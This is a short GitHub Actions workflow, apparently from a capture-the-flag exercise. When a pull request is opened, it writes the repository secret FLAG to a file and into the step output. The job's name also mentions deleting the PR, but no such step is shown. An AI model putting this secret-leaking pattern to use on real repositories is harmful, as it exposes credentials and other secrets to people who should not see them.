name: Ninja

on:
  pull_request:
    types:
      - opened

jobs:
  print-secret-and-delete-pr:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout code
        uses: actions/checkout@v2

      - name: Print Secret to PR
        run: |
          echo "Secret Value: ${{ secrets.FLAG }}" > secret_output.txt
          echo "SECRET_OUTPUT=$(cat secret_output.txt)" >> $GITHUB_OUTPUT
